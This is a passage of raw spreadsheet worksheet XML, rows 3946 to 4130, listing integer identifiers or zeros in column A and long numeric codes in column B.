    <row r="3946" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3946">
        <v>5021</v>
      </c>
      <c r="B3946">
        <v>9120214142453</v>
      </c>
    </row>
    <row r="3947" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3947">
        <v>0</v>
      </c>
    </row>
    <row r="3948" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3948">
        <v>0</v>
      </c>
    </row>
    <row r="3949" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3949">
        <v>0</v>
      </c>
    </row>
    <row r="3950" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3950">
        <v>0</v>
      </c>
    </row>
    <row r="3951" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3951">
        <v>0</v>
      </c>
    </row>
    <row r="3952" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3952">
        <v>5023</v>
      </c>
      <c r="B3952">
        <v>220005730962</v>
      </c>
    </row>
    <row r="3953" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3953">
        <v>0</v>
      </c>
    </row>
    <row r="3954" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3954">
        <v>5024</v>
      </c>
      <c r="B3954">
        <v>220306970831</v>
      </c>
    </row>
    <row r="3955" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3955">
        <v>0</v>
      </c>
      <c r="B3955">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3956" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3956">
        <v>5025</v>
      </c>
      <c r="B3956">
        <v>287000952315</v>
      </c>
    </row>
    <row r="3957" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3957">
        <v>0</v>
      </c>
      <c r="B3957">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3958" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3958">
        <v>0</v>
      </c>
      <c r="B3958">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3959" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3959">
        <v>5026</v>
      </c>
      <c r="B3959">
        <v>9120017240543</v>
      </c>
    </row>
    <row r="3960" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3960">
        <v>0</v>
      </c>
      <c r="B3960">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3961" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3961">
        <v>0</v>
      </c>
      <c r="B3961">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3962" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3962">
        <v>0</v>
      </c>
      <c r="B3962">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3963" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3963">
        <v>0</v>
      </c>
      <c r="B3963">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3964" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3964">
        <v>0</v>
      </c>
      <c r="B3964">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3965" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3965">
        <v>0</v>
      </c>
      <c r="B3965">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3966" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3966">
        <v>0</v>
      </c>
      <c r="B3966">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3967" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3967">
        <v>0</v>
      </c>
    </row>
    <row r="3968" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3968">
        <v>0</v>
      </c>
      <c r="B3968">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3969" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3969">
        <v>5027</v>
      </c>
      <c r="B3969">
        <v>9120106562632</v>
      </c>
    </row>
    <row r="3970" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3970">
        <v>0</v>
      </c>
      <c r="B3970">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3971" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3971">
        <v>0</v>
      </c>
      <c r="B3971">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3972" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3972">
        <v>0</v>
      </c>
      <c r="B3972">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3973" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3973">
        <v>5028</v>
      </c>
      <c r="B3973">
        <v>220400841319</v>
      </c>
    </row>
    <row r="3974" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3974">
        <v>0</v>
      </c>
      <c r="B3974">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3975" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3975">
        <v>0</v>
      </c>
      <c r="B3975">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3976" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3976">
        <v>0</v>
      </c>
    </row>
    <row r="3977" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3977">
        <v>0</v>
      </c>
      <c r="B3977">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3978" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3978">
        <v>0</v>
      </c>
      <c r="B3978">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3979" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3979">
        <v>0</v>
      </c>
      <c r="B3979">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3980" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3980">
        <v>5029</v>
      </c>
      <c r="B3980">
        <v>8120008991728</v>
      </c>
    </row>
    <row r="3981" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3981">
        <v>5030</v>
      </c>
      <c r="B3981">
        <v>9120001101313</v>
      </c>
    </row>
    <row r="3982" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3982">
        <v>5031</v>
      </c>
      <c r="B3982">
        <v>9120508753203</v>
      </c>
    </row>
    <row r="3983" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3983">
        <v>5032</v>
      </c>
      <c r="B3983">
        <v>9120202252689</v>
      </c>
    </row>
    <row r="3984" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3984">
        <v>1124</v>
      </c>
      <c r="B3984">
        <v>8120003840633</v>
      </c>
    </row>
    <row r="3985" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3985">
        <v>5033</v>
      </c>
      <c r="B3985">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3986" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3986">
        <v>0</v>
      </c>
    </row>
    <row r="3987" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3987">
        <v>0</v>
      </c>
    </row>
    <row r="3988" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3988">
        <v>0</v>
      </c>
      <c r="B3988">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3989" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3989">
        <v>0</v>
      </c>
      <c r="B3989">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3990" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3990">
        <v>0</v>
      </c>
      <c r="B3990">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3991" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3991">
        <v>0</v>
      </c>
      <c r="B3991">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3992" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3992">
        <v>0</v>
      </c>
    </row>
    <row r="3993" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3993">
        <v>0</v>
      </c>
    </row>
    <row r="3994" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3994">
        <v>0</v>
      </c>
    </row>
    <row r="3995" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3995">
        <v>0</v>
      </c>
    </row>
    <row r="3996" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3996">
        <v>0</v>
      </c>
      <c r="B3996">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3997" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3997">
        <v>0</v>
      </c>
    </row>
    <row r="3998" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3998">
        <v>0</v>
      </c>
      <c r="B3998">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3999" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3999">
        <v>0</v>
      </c>
      <c r="B3999">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="4000" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4000">
        <v>0</v>
      </c>
    </row>
    <row r="4001" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4001">
        <v>0</v>
      </c>
      <c r="B4001">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="4002" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4002">
        <v>0</v>
      </c>
    </row>
    <row r="4003" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4003">
        <v>0</v>
      </c>
    </row>
    <row r="4004" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4004">
        <v>0</v>
      </c>
    </row>
    <row r="4005" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4005">
        <v>0</v>
      </c>
    </row>
    <row r="4006" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4006">
        <v>0</v>
      </c>
    </row>
    <row r="4007" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4007">
        <v>0</v>
      </c>
    </row>
    <row r="4008" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4008">
        <v>0</v>
      </c>
      <c r="B4008">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="4009" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4009">
        <v>0</v>
      </c>
      <c r="B4009">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="4010" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4010">
        <v>0</v>
      </c>
    </row>
    <row r="4011" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4011">
        <v>0</v>
      </c>
    </row>
    <row r="4012" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4012">
        <v>5034</v>
      </c>
      <c r="B4012">
        <v>220001520556</v>
      </c>
    </row>
    <row r="4013" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4013">
        <v>0</v>
      </c>
      <c r="B4013">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="4014" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4014">
        <v>0</v>
      </c>
    </row>
    <row r="4015" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4015">
        <v>0</v>
      </c>
      <c r="B4015">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="4016" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4016">
        <v>0</v>
      </c>
    </row>
    <row r="4017" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4017">
        <v>0</v>
      </c>
      <c r="B4017">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="4018" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4018">
        <v>0</v>
      </c>
    </row>
    <row r="4019" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4019">
        <v>0</v>
      </c>
    </row>
    <row r="4020" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4020">
        <v>0</v>
      </c>
      <c r="B4020">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="4021" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4021">
        <v>0</v>
      </c>
    </row>
    <row r="4022" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4022">
        <v>0</v>
      </c>
      <c r="B4022">
        <v>8120004801168</v>
      </c>
    </row>
    <row r="4023" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4023">
        <v>5035</v>
      </c>
      <c r="B4023">
        <v>9120415083102</v>
      </c>
    </row>
    <row r="4024" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4024">
        <v>5037</v>
      </c>
      <c r="B4024">
        <v>9120100191247</v>
      </c>
    </row>
    <row r="4025" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4025">
        <v>5038</v>
      </c>
      <c r="B4025">
        <v>8120116081128</v>
      </c>
    </row>
    <row r="4026" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4026">
        <v>5039</v>
      </c>
      <c r="B4026">
        <v>220004182014</v>
      </c>
    </row>
    <row r="4027" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4027">
        <v>5040</v>
      </c>
      <c r="B4027">
        <v>8120210022746</v>
      </c>
    </row>
    <row r="4028" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4028">
        <v>5041</v>
      </c>
      <c r="B4028">
        <v>220204251476</v>
      </c>
    </row>
    <row r="4029" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4029">
        <v>1199</v>
      </c>
    </row>
    <row r="4030" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4030">
        <v>5042</v>
      </c>
      <c r="B4030">
        <v>259010000936</v>
      </c>
    </row>
    <row r="4031" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4031">
        <v>1246</v>
      </c>
      <c r="B4031">
        <v>220005572461</v>
      </c>
    </row>
    <row r="4032" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4032">
        <v>5043</v>
      </c>
      <c r="B4032">
        <v>8120007961634</v>
      </c>
    </row>
    <row r="4033" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4033">
        <v>5044</v>
      </c>
      <c r="B4033">
        <v>282000922384</v>
      </c>
    </row>
    <row r="4034" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4034">
        <v>5046</v>
      </c>
      <c r="B4034">
        <v>220003790696</v>
      </c>
    </row>
    <row r="4035" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4035">
        <v>2857</v>
      </c>
      <c r="B4035">
        <v>8120202990554</v>
      </c>
    </row>
    <row r="4036" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4036">
        <v>5047</v>
      </c>
      <c r="B4036">
        <v>8120006931042</v>
      </c>
    </row>
    <row r="4037" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4037">
        <v>5048</v>
      </c>
      <c r="B4037">
        <v>262010020276</v>
      </c>
    </row>
    <row r="4038" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4038">
        <v>1302</v>
      </c>
    </row>
    <row r="4039" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4039">
        <v>5049</v>
      </c>
      <c r="B4039">
        <v>252010020455</v>
      </c>
    </row>
    <row r="4040" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4040">
        <v>5050</v>
      </c>
      <c r="B4040">
        <v>262010020276</v>
      </c>
    </row>
    <row r="4041" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4041">
        <v>5051</v>
      </c>
      <c r="B4041">
        <v>262010020276</v>
      </c>
    </row>
    <row r="4042" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4042">
        <v>5052</v>
      </c>
      <c r="B4042">
        <v>220105463303</v>
      </c>
    </row>
    <row r="4043" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4043">
        <v>5053</v>
      </c>
      <c r="B4043">
        <v>220309220153</v>
      </c>
    </row>
    <row r="4044" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4044">
        <v>1380</v>
      </c>
      <c r="B4044">
        <v>912008702965</v>
      </c>
    </row>
    <row r="4045" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4045">
        <v>1127</v>
      </c>
      <c r="B4045">
        <v>8120109802991</v>
      </c>
    </row>
    <row r="4046" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4046">
        <v>5054</v>
      </c>
      <c r="B4046">
        <v>220107171841</v>
      </c>
    </row>
    <row r="4047" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4047">
        <v>1223</v>
      </c>
      <c r="B4047">
        <v>9120100191247</v>
      </c>
    </row>
    <row r="4048" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4048">
        <v>5055</v>
      </c>
      <c r="B4048">
        <v>8120101942174</v>
      </c>
    </row>
    <row r="4049" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4049">
        <v>5056</v>
      </c>
      <c r="B4049">
        <v>8120212221176</v>
      </c>
    </row>
    <row r="4050" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4050">
        <v>5057</v>
      </c>
      <c r="B4050">
        <v>8120212221176</v>
      </c>
    </row>
    <row r="4051" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4051">
        <v>5058</v>
      </c>
      <c r="B4051">
        <v>220106332508</v>
      </c>
    </row>
    <row r="4052" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4052">
        <v>5059</v>
      </c>
      <c r="B4052">
        <v>220003652671</v>
      </c>
    </row>
    <row r="4053" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4053">
        <v>34</v>
      </c>
      <c r="B4053">
        <v>8120004871089</v>
      </c>
    </row>
    <row r="4054" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4054">
        <v>458</v>
      </c>
      <c r="B4054">
        <v>8120007921536</v>
      </c>
    </row>
    <row r="4055" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4055">
        <v>1068</v>
      </c>
      <c r="B4055">
        <v>9120301152923</v>
      </c>
    </row>
    <row r="4056" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4056">
        <v>5060</v>
      </c>
      <c r="B4056">
        <v>246010010887</v>
      </c>
    </row>
    <row r="4057" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4057">
        <v>5061</v>
      </c>
      <c r="B4057">
        <v>220005880136</v>
      </c>
    </row>
    <row r="4058" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4058">
        <v>1245</v>
      </c>
      <c r="B4058">
        <v>8120003931926</v>
      </c>
    </row>
    <row r="4059" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4059">
        <v>5062</v>
      </c>
      <c r="B4059">
        <v>220002740813</v>
      </c>
    </row>
    <row r="4060" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4060">
        <v>5063</v>
      </c>
      <c r="B4060">
        <v>220004221456</v>
      </c>
    </row>
    <row r="4061" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4061">
        <v>5064</v>
      </c>
      <c r="B4061">
        <v>203010031352</v>
      </c>
    </row>
    <row r="4062" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4062">
        <v>791</v>
      </c>
      <c r="B4062">
        <v>8120118050622</v>
      </c>
    </row>
    <row r="4063" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4063">
        <v>5065</v>
      </c>
      <c r="B4063">
        <v>220003652671</v>
      </c>
    </row>
    <row r="4064" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4064">
        <v>89</v>
      </c>
    </row>
    <row r="4065" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4065">
        <v>5066</v>
      </c>
      <c r="B4065">
        <v>235001900974</v>
      </c>
    </row>
    <row r="4066" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4066">
        <v>1047</v>
      </c>
    </row>
    <row r="4067" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4067">
        <v>1197</v>
      </c>
      <c r="B4067">
        <v>9120305962468</v>
      </c>
    </row>
    <row r="4068" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4068">
        <v>5067</v>
      </c>
      <c r="B4068">
        <v>8120001970582</v>
      </c>
    </row>
    <row r="4069" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4069">
        <v>5068</v>
      </c>
      <c r="B4069">
        <v>9120309321121</v>
      </c>
    </row>
    <row r="4070" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4070">
        <v>5069</v>
      </c>
      <c r="B4070">
        <v>9120008881244</v>
      </c>
    </row>
    <row r="4071" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4071">
        <v>0</v>
      </c>
    </row>
    <row r="4072" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4072">
        <v>0</v>
      </c>
    </row>
    <row r="4073" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4073">
        <v>0</v>
      </c>
      <c r="B4073">
        <v>220703970413</v>
      </c>
    </row>
    <row r="4074" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4074">
        <v>0</v>
      </c>
    </row>
    <row r="4075" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4075">
        <v>0</v>
      </c>
    </row>
    <row r="4076" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4076">
        <v>0</v>
      </c>
    </row>
    <row r="4077" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4077">
        <v>0</v>
      </c>
    </row>
    <row r="4078" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4078">
        <v>0</v>
      </c>
    </row>
    <row r="4079" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4079">
        <v>0</v>
      </c>
      <c r="B4079">
        <v>220703970413</v>
      </c>
    </row>
    <row r="4080" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4080">
        <v>0</v>
      </c>
    </row>
    <row r="4081" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4081">
        <v>0</v>
      </c>
    </row>
    <row r="4082" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4082">
        <v>0</v>
      </c>
    </row>
    <row r="4083" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4083">
        <v>0</v>
      </c>
    </row>
    <row r="4084" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4084">
        <v>5073</v>
      </c>
      <c r="B4084">
        <v>220703970413</v>
      </c>
    </row>
    <row r="4085" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4085">
        <v>0</v>
      </c>
    </row>
    <row r="4086" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4086">
        <v>0</v>
      </c>
    </row>
    <row r="4087" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4087">
        <v>0</v>
      </c>
    </row>
    <row r="4088" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4088">
        <v>5074</v>
      </c>
      <c r="B4088">
        <v>220008672693</v>
      </c>
    </row>
    <row r="4089" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4089">
        <v>5075</v>
      </c>
      <c r="B4089">
        <v>217000932225</v>
      </c>
    </row>
    <row r="4090" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4090">
        <v>5076</v>
      </c>
      <c r="B4090">
        <v>9120200541607</v>
      </c>
    </row>
    <row r="4091" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4091">
        <v>1210</v>
      </c>
      <c r="B4091">
        <v>8120100910932</v>
      </c>
    </row>
    <row r="4092" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4092">
        <v>5077</v>
      </c>
      <c r="B4092">
        <v>9120208601199</v>
      </c>
    </row>
    <row r="4093" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4093">
        <v>1352</v>
      </c>
      <c r="B4093">
        <v>8120111120124</v>
      </c>
    </row>
    <row r="4094" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4094">
        <v>5078</v>
      </c>
      <c r="B4094">
        <v>9120317101046</v>
      </c>
    </row>
    <row r="4095" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4095">
        <v>5079</v>
      </c>
      <c r="B4095">
        <v>9120014040986</v>
      </c>
    </row>
    <row r="4096" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4096">
        <v>5080</v>
      </c>
      <c r="B4096">
        <v>220404841125</v>
      </c>
    </row>
    <row r="4097" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4097">
        <v>5081</v>
      </c>
      <c r="B4097">
        <v>9120014060347</v>
      </c>
    </row>
    <row r="4098" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4098">
        <v>5082</v>
      </c>
      <c r="B4098">
        <v>243000920164</v>
      </c>
    </row>
    <row r="4099" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4099">
        <v>5083</v>
      </c>
      <c r="B4099">
        <v>220105172074</v>
      </c>
    </row>
    <row r="4100" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4100">
        <v>5084</v>
      </c>
      <c r="B4100">
        <v>220300321423</v>
      </c>
    </row>
    <row r="4101" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4101">
        <v>5085</v>
      </c>
      <c r="B4101">
        <v>258000902745</v>
      </c>
    </row>
    <row r="4102" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4102">
        <v>5086</v>
      </c>
      <c r="B4102">
        <v>220205652157</v>
      </c>
    </row>
    <row r="4103" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4103">
        <v>5087</v>
      </c>
      <c r="B4103">
        <v>9120319181433</v>
      </c>
    </row>
    <row r="4104" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4104">
        <v>5088</v>
      </c>
      <c r="B4104">
        <v>220306241704</v>
      </c>
    </row>
    <row r="4105" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4105">
        <v>5089</v>
      </c>
      <c r="B4105">
        <v>9120107722945</v>
      </c>
    </row>
    <row r="4106" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4106">
        <v>486</v>
      </c>
      <c r="B4106">
        <v>8120102811563</v>
      </c>
    </row>
    <row r="4107" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4107">
        <v>5091</v>
      </c>
      <c r="B4107">
        <v>9120104110126</v>
      </c>
    </row>
    <row r="4108" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4108">
        <v>875</v>
      </c>
      <c r="B4108">
        <v>9120316080573</v>
      </c>
    </row>
    <row r="4109" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4109">
        <v>695</v>
      </c>
      <c r="B4109">
        <v>217000932225</v>
      </c>
    </row>
    <row r="4110" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4110">
        <v>5092</v>
      </c>
      <c r="B4110">
        <v>9120004163216</v>
      </c>
    </row>
    <row r="4111" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4111">
        <v>5093</v>
      </c>
      <c r="B4111">
        <v>220101812756</v>
      </c>
    </row>
    <row r="4112" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4112">
        <v>5094</v>
      </c>
      <c r="B4112">
        <v>8120200831147</v>
      </c>
    </row>
    <row r="4113" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4113">
        <v>5095</v>
      </c>
      <c r="B4113">
        <v>220200720473</v>
      </c>
    </row>
    <row r="4114" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4114">
        <v>691</v>
      </c>
      <c r="B4114">
        <v>9120006590079</v>
      </c>
    </row>
    <row r="4115" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4115">
        <v>5096</v>
      </c>
      <c r="B4115">
        <v>211013042233</v>
      </c>
    </row>
    <row r="4116" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4116">
        <v>1232</v>
      </c>
      <c r="B4116">
        <v>8120110232884</v>
      </c>
    </row>
    <row r="4117" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4117">
        <v>5097</v>
      </c>
      <c r="B4117">
        <v>286000932356</v>
      </c>
    </row>
    <row r="4118" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4118">
        <v>5098</v>
      </c>
      <c r="B4118">
        <v>224000922999</v>
      </c>
    </row>
    <row r="4119" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4119">
        <v>1290</v>
      </c>
      <c r="B4119">
        <v>8120116081128</v>
      </c>
    </row>
    <row r="4120" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4120">
        <v>5099</v>
      </c>
      <c r="B4120">
        <v>261000931662</v>
      </c>
    </row>
    <row r="4121" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4121">
        <v>5100</v>
      </c>
      <c r="B4121">
        <v>9120004262633</v>
      </c>
    </row>
    <row r="4122" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4122">
        <v>5101</v>
      </c>
      <c r="B4122">
        <v>220009750529</v>
      </c>
    </row>
    <row r="4123" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4123">
        <v>5102</v>
      </c>
      <c r="B4123">
        <v>220200131974</v>
      </c>
    </row>
    <row r="4124" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4124">
        <v>5103</v>
      </c>
      <c r="B4124">
        <v>231012062734</v>
      </c>
    </row>
    <row r="4125" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4125">
        <v>5104</v>
      </c>
      <c r="B4125">
        <v>220101812756</v>
      </c>
    </row>
    <row r="4126" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4126">
        <v>5105</v>
      </c>
      <c r="B4126">
        <v>9120201961605</v>
      </c>
    </row>
    <row r="4127" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4127">
        <v>5106</v>
      </c>
      <c r="B4127">
        <v>220107510869</v>
      </c>
    </row>
    <row r="4128" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4128">
        <v>5107</v>
      </c>
      <c r="B4128">
        <v>9120207772143</v>
      </c>
    </row>
    <row r="4129" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4129">
        <v>166</v>
      </c>
      <c r="B4129">
        <v>288010061363</v>
      </c>
    </row>
    <row r="4130" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A4130">
        <v>5108</v>
      </c>
      <c r="B4130">
        <v>230000952288</v>
